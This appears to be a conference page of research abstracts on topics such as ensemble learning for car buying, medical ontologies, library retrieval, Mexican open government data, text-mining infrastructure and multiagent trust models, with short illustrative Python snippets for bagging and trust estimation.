Akarsh Goyal, VIT University, Computer Science and Engineering, India
Abstract: Cars are an essential part of our everyday life. Nowadays we have a wide range of cars produced by many companies in all segments. The buyer has to consider a lot of factors while buying a car, which makes the whole process much more difficult. In this paper we therefore develop an ensemble learning method to aid people in making the decision. Bagging, boosting and voting ensemble learning have been used to improve the precision rate, i.e. the classification accuracy. We have also applied class association rules to see whether they perform better than collaborative filtering for suggesting items to the user.
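The bagging-plus-majority-voting idea mentioned above can be illustrated minimally as follows. The base learner (a 1-nearest-neighbour classifier), the toy data and the parameter choices are illustrative assumptions, not the paper's setup:

```python
import numpy as np

rng = np.random.default_rng(42)

def nn_predict(train_X, train_y, X):
    """1-nearest-neighbour base learner (stand-in for any base classifier)."""
    d = np.linalg.norm(X[:, None] - train_X[None], axis=2)
    return train_y[np.argmin(d, axis=1)]

def bagging_predict(X_train, y_train, X_test, n_estimators=11):
    """Bagging: fit each base learner on a bootstrap sample, then majority-vote."""
    votes = []
    for _ in range(n_estimators):
        idx = rng.integers(0, len(X_train), len(X_train))   # bootstrap sample
        votes.append(nn_predict(X_train[idx], y_train[idx], X_test))
    votes = np.stack(votes)
    # majority vote per test point across the ensemble
    return np.array([np.bincount(col).argmax() for col in votes.T])

# Toy two-class data standing in for "acceptable" vs "unacceptable" cars.
X = np.vstack([rng.normal(0, 1, (50, 2)), rng.normal(4, 1, (50, 2))])
y = np.array([0] * 50 + [1] * 50)
X_test = np.array([[0.0, 0.0], [4.0, 4.0]])
print(bagging_predict(X, y, X_test))
```

Each bootstrap resample perturbs the training set, so the vote averages away the variance of the individual learners; boosting, by contrast, reweights examples sequentially rather than resampling independently.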
Abdel-Badeeh M. Salem, Ain Shams University, Faculty of Computer and Information sciences, Egypt
Abstract: Ontologies were developed in artificial intelligence (AI) to facilitate knowledge management, sharing and reuse. Since the beginning of the nineties, ontologies have become a popular research topic investigated by several AI and knowledge engineering research communities. Ontologies are used in applications related to knowledge management, natural language processing, e-activities, intelligent information integration, information retrieval, database integration, bioinformatics and education, and in new emerging fields like the semantic web. Ontologies are now ubiquitous in many intelligent information-systems enterprises; they are used in e-health and in various tasks of the biological and medical sciences. This talk presents some examples of ontologies developed by the author and his colleagues at the Medical Informatics and Knowledge Engineering Research Labs, Ain Shams University, Cairo, Egypt.
Chrysostomos Kapetis, Athens University of Economics and Business, Department of Informatics, Greece
Abstract: In recent years, the rapid developments in the fields of computer science and communication have dramatically influenced the operation of libraries and information centers and the way they organize their collections. Their collections are mainly enriched with digitized material from heterogeneous and distributed sources of information. Current library information systems do not fulfil the requirements of libraries, as shaped by the new sources of information and types of material. The adoption of multiple heterogeneous software systems has led to additional problems, mainly for library users, who are now obliged to interact with multiple interfaces in order to locate and retrieve the requested information. Federated and discovery search systems partially solve the aforementioned issues, but they are subject to restrictions and have weaknesses. In the present paper a) we illustrate the current situation regarding the organization and management of information, stressing the most important problems and weaknesses, and b) we propose a new dynamically defined framework which will work as TIPOUKEITOS (What-Where-Lies) and will provide a set of universal services forming a united and integrated environment for information management and retrieval.
Valentino Morales, Centro de Investigación e Innovación en Tecnologías de la Información y Comunicación INFOTEC, Dirección Adjunta de Innovación y Conocimiento, Mexico
Hector Edgar Buenrostro-Mercado, INFOTEC, DAIC, Mexico
Ramon Reyes-Carrion, Centro de Investigación e Innovación en Tecnologías de la Información y Comunicación INFOTEC, Dirección Adjunta de Innovación y Conocimiento, Mexico
Abstract: The object of this paper is to present the conceptual design and proof of concept of a platform to monitor and analyse open data from the Mexican government. The base concepts of the platform design are open government, open data and the intelligence process. The platform has four elements: a web crawler, a repository of raw data, curated data, and data analysis. Analysis of the data is based on data mining with tools such as Orange and KNIME; the incorporation of big data algorithms is being considered for subsequent versions, as other members of the research team are working on them. The proof of concept focuses on budget and spending data from the Mexican government since, according to the Open Data Barometer and the Open Data Index, these are the categories in which the Mexican government has 100% fulfilment. The paper consists of the following parts: a) open government; b) open data; c) design of the analysis of open data; d) proof of the conceptual design of the platform on budget and spending data from the Mexican government.
Peter Mutschke, GESIS – Leibniz Institute for the Social Sciences , Dep. Knowledge Technologies for the Social Sciences, Germany
Abstract: Text Mining (TM) is emerging as a powerful tool for uncovering knowledge in unstructured textual data, such as salient content items and entities, the patterns they may follow, and hidden relationships between different entities. TM therefore has great potential to improve the indexing and searching of scholarly content. However, the high heterogeneity of current text mining tools makes applying them a challenging task for end users (researchers, curators, librarians, policy makers, etc.). To overcome these high entry costs, the EU-funded project OpenMinTeD aims at providing an open and sustainable TM infrastructure that makes primary content accessible through standardized interfaces and allows text to be processed, analyzed and annotated by well-documented text mining services and workflows, better facilitating the identification and extraction of content items, patterns and relationships to be used for structuring, indexing and searching content. The talk introduces OpenMinTeD and discusses several application areas from the perspective of the social science domain.
Nick Bassiliades, Aristotle University of Thessaloniki, Department of Informatics, Greece
Abstract: Agents are supposed to act in open, and thus risky, environments with limited or no human intervention. Making the appropriate decision about whom to trust in order to interact with is necessary but challenging. To this end, many trust and reputation models, based on interaction trust or witness reputation, have been proposed. These models are either centralized, where one or more central trust authorities keep agent interaction references (ratings) and give trust estimations, or decentralized, where each agent keeps its own interaction references with other agents and must estimate on its own the trust to place in another agent. The centralized approaches are simpler to implement and provide better and faster trust estimations; decentralized approaches, on the other hand, although they need more complex interaction protocols, are more robust, since they do not have a single point of failure, and more realistic, since in open environments central controlling authorities are hard to enforce. In this talk, the above issues are presented and analyzed along with the most important solutions in the literature. Then, a number of research proposals by the speaker and his research associates towards centralized and distributed trust and reputation multiagent models are presented. These models are based both on numerical aggregations of selected agent interaction references and on symbolic reasoning methods that use defeasible logic, a non-monotonic rule-based approach for efficient reasoning with incomplete and possibly inconsistent information.
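A numerical trust estimate of the kind the talk mentions, aggregating interaction ratings about a target agent, can be sketched as follows. The recency weighting, half-life constant and rating scale are illustrative assumptions in the general spirit of such models, not a specific model from the talk:

```python
# Hypothetical sketch: weight each rating by how recent it is, so a target's
# current behaviour dominates its older history. Parameters are illustrative.
import math

def trust_estimate(ratings, now, half_life=10.0):
    """ratings: list of (timestamp, score in [0, 1]) about one target agent."""
    num = den = 0.0
    for t, score in ratings:
        w = math.exp(-math.log(2) * (now - t) / half_life)  # recency weight
        num += w * score
        den += w
    return num / den if den else 0.5   # no evidence -> neutral trust

ratings = [(0, 0.2), (8, 0.9), (10, 1.0)]   # target improved over time
print(round(trust_estimate(ratings, now=10), 3))
```

With a half-life of 10, the early poor rating still counts half as much as a fresh one, so the estimate sits well above the plain average but below the latest score. A decentralized variant would compute the same aggregate over only the references the estimating agent holds locally.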